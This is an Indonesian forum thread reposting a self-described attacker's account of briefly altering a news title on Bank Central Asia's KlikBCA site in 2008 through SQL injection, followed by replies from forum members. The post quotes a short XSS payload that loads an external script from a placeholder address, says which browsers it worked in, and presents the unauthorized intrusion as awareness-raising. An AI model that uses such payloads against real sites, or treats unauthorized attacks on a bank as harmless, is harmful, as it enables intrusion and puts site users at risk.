BCA di deface

[produkgagal2]

sekedar copy paste dari http://www.jasakom.com/forum/viewtop...&sd=a&start=15

dan

http://www.jasakom.com/forum/viewtop...st=0&sk=t&sd=a

berikut ringkasan yg gw pilih dari forum nya JS, untuk lebih jelasnya dan bertanya langsung kepada si pentes silahkan meluncur langsung ke TKP

Agak risih jga sbnernya...pi. iah sudahlah, toh ane ngga pernah ada maksud buat ngambil keuntungan disini. Mudah2an postingan ane ini bsa ngasih sedikit kejelasan, n ngelurusin smwnya.(*wish)

Code:

1.situs BCA di-deface

-->TRUE...kejadian kira2 jm 00.00-nn.nn dini hari kmaren(*agak lupa jg tpatnya jm brpa)
klarifikasi : ane ngga ada mksud buat ngelakuin permanent defacement,(*detail:no 6)

Code:

2.KlikBCA dideface pagi ini, 2008-11-27 sebelum jam 9.(*http://www.jasakom.com/forum/viewtopic.php?f=112&t=3589&p=31507)

-->FALSE...kembali ke no 1.

Code:

3.attacker melakukan DNS spoofing?(*http://tech.groups.yahoo.com/group/jasakom-perjuangan/message/40242?threaded=1&p=1)

-->FALSE...kembali ke no 1.

Code:

4.Attacker melakukan sql injection atau teknik lainnya sehingga dia bisa merubah data judul didalam database. Text yg ditampilkan adalah spt berikut:  Title <script>document.write("<Scri");</script>pt>window.open("http://address");</script>end of title.(statement by M0j4)

-->basic SQL injection(*patched!!!..^_^. double thumbs up for admin)...untuk script lbih tepatnya :
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://address"></SCRIPT>

Code:

5.Apakah ente ngambil keuntungan disini,kek semacam list CC, debit saldo ATM, no rekening, PIN, etc?

-->buat para nasabah BCA, ane harap ngga ada yang merasa khawatir, karena ane emang SAMA SEKALI NGGA PERNAH punya niat buat nyabotase DB-nya, ane ngga pernah ngambil keuntungan disini...motif ane ngelakuin niy semua smata-mata cuma pngen nyebarin security awareness.
n ngingetin, there are no system with secure rate 100%, aware ajah mending, ketimbang kecolongan kaya gnih, susah jadinya.

Code:

6.Detail.

-->ane cuma ng-exec query DML dua kali berturut-turut. Pertama, nyisipin script(no 4). Kedua, ngapus script(*ane tadi), DALAM selang wktu-nya ngga nyampe a.k.a kurang dari a.k.a &lt;5 menit di hari dan jm yng sma.
PERTANYAANNYA, apa mungkin title yang udah ane recover lgih ke-keadaan semula(*tanpa script/no 4). bisa balik ke-keadaan wktu ane nyisipin script(no 4)...<--sumpah, ampe skrng ane msih bngung ma yang niy.ntah dya nge-rollback atw gmnah, who knowns?

Code:

7.klikbca klo bisa dideface segitu gampangnya si udah pada kabur kali pelanggan bca. apa beritanya gak salah ini?(*http://tech.groups.yahoo.com/group/jasakom-perjuangan/message/40252?threaded=1&p=3)

-->ngga salah lagi...kembali ke no 1.

Code:

8.Yups, gak da yang salah ma tu website... sy jg dah beberapa kali buka, tapi gak nemuin hal yg 
janggal(*http://tech.groups.yahoo.com/group/jasakom-perjuangan/message/40253?threaded=1&p=5)

--FALSE...kembali ke no 1.


**kesimpulan :
-ane, HANYA melakukan perubahan title salah satu news, DI Http://www.klikbca.com, yang kemudian dirubah lgih ke-keadaan "normal" DALAM selang wktu kurang dari a.k.a &lt; a.k.a kecil dari 5 menit ,kamis 27 november 2k8 dinihari.(no 6)
-ane, NGGA PERNAH ada maksud buat ngelakuin defacement secara permanent.(no 1)
-Buat semua pihak(*siapapun itu) yang ngerasa dirugiin dngan hal ini, ane secara pribadi menyatakan permintaan MA'AF atas apa yang udah ane lakuin.

to. all...
video(*taken at 00.00-nn.nn o'clock 27 nov 2k8)->result doank!!!.

Code:

http://www.metacafe.com/watch/2094538/http_www_klikbca_com_taken/

image(*taken at 00.00-nn.nn o'clock 27 nov 2k8)->screenshoot

Code:

http://img87.imageshack.us/img87/4782/screenshootbase64encodedd3.jpg

**note : this isn't fuc**n SHOWOFF.

@contardojvk, analisis ente cukup akurat, meski masih kurang begitu spesifik.
There aren't double translation, only a kind of xss injection technique,
called "HTML quote encapsulation XSS..."
overall, nice found(*shakeHands..^_^..)

script tested on:
Konqueror 3.5.3(Using KDE 3.5.3)-->fine
Netscape navigator 9.0.0.5-->fine
Safari 3.0.4(523.15)-->fine
Mozilla firefox 3.0.4-->fine
Opera v 9.26 build 8835 a.k.a Opera/9.26 (Windows NT 5.1; U; en)-->fine
Internet Explorer 7.0.5730.13-->not work.

iah udah...kyanya dari ane itu ajah. Untuk kedua kalinya ane nyatain permohonan MA'AF ane u/ smw pihak yng udah ngerasa dirugiin dengan hal ini.
no offense, best regard'z from me, yORz.rya aka angga_r1409 aka wifirmitye.

ISSUE(*MIRROR):
*http://www.jasakom.com/forum/viewtop...t=3589&p=31507
*http://tech.groups.yahoo.com/group/j.../message/40235

-==[EOF]==--

[fatnir]

apaan si om?
gw kok ga ngerti... swt

uda baca ulang2 tetep ga ngerti...

[ventriloquist]

itu pesan dari hacker kalo situs BCA ga secure n bisa d bobol
dia hack cuma buat ngingetin supaya sistem keamanannya diperbaiki..

[Myozi]

buat evaluasi ulang sebelum benar2 di bobol oleh orang yang tak bertanggung jawab
semakin banyak serangan maka semakin banyak perbaikan agar lebih aman

[luvlovin]

di bagian News berita, itu kan bagian sub script yang rentan dan sering di ubah tiap hari. jd harusnya sub berita NEWs ini di perketat lagi scriptnya biar gak mudah di jebol gitu maksunya sipelaku.

buat TS/sipelaku udah kirim email ke pihak BCA tentang hal ini, soalnya ini menyangkut kualitas bangsa kita juga, klo sampe kedenger mata dunia luar bahwa BCA indonesi gak bagus gimana?

[Hocrux]

Btw Deface itu bentuk Hacking seperti apa bro? OOT neh

[g10v4nd1]

masa bisa segitu gampangnya di hack sih .. payah dong keamanan bank

[produkgagal2]

lah, masih ada yg commentin thread gw ini? ah basi beritanya juga , sebenarnya ini juga masih jadi perdebatan pada saat terkahir gw liat, ada yg meng claim hal yang di ketemukan oleh sang bug hunter bukanlah suatu tindakan deface melainkan karena lambatnya response yang muncul pada browser sang bug hunter( si jack yang bilang kalo ga salah), btw kalo mau liat kronologisnya meluncur aja langsung ke TKP ya, gw males buka2 lagi